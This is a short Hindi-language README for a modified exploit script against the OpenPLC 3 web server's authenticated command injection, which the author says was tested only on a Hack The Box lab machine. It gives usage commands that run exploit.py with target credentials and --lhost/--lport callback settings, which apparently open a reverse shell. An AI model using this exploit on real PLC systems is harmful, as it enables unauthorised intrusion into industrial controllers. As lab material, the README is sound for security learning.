
OpenPLC 3 वेब सर्वर प्रमाणित दूरस्थ कोड निष्पादन।
OpenPLC 3 वेबसर्वर प्रमाणित दूरस्थ कोड निष्पादन।
Open PLC वेबसर्वर v3 में कमांड इंजेक्शन की उपस्थिति दूरस्थ हमलावरों को मनमाना कोड चलाने में सक्षम बनाती है। केवल HTB Wifinetictwo.htb मशीन पर परीक्षण किया गया।
मुझे उन सभी स्क्रिप्ट्स में समस्याएँ मिलीं जो भेद्यता का शोषण करती थीं, शायद इसलिए क्योंकि मैं पैरट का उपयोग कर रहा हूँ या मेरा ब्राउज़र, क्रोमियम लॉगिन के लिए काम करता है, मुझे फ़ायरफ़ॉक्स के साथ लॉगिन समस्याएँ थीं और वेब सर्वर के साथ लॉग इन करने के लिए POST अनुरोध में कुछ अजीब होता है। मैंने thewhiteh4t से स्क्रिप्ट को संशोधित किया है, इसमें कुछ भाग (मुख्य रूप से अपलोड विधि) हैं जो बस कॉपी किए गए हैं, लेकिन मैंने वह भाग बदल दिया है जो एक्सप्लॉइट लॉन्च करने के लिए सर्वर से कुकीज़ प्राप्त करता है।
मूल PoC Fellipe Oliveira द्वारा प्रदान किया गया है।
आशा है कि यह आपकी मदद करेगा यदि आपको इसमें समस्या हो।
pip3 install requests
python3 exploit.py http://10.129.x.x:8080 user pass --lhost 10.10.x.x --lport xxxx
वैकल्पिक रूप से, आप exploit.py को संशोधित कर सकते हैं
...
# LHOST y LPORT defaults
LHOST = '10.10.1.1'
LPORT = '4444'
...
python3 exploit.py http://10.129.x.x:8080 user pass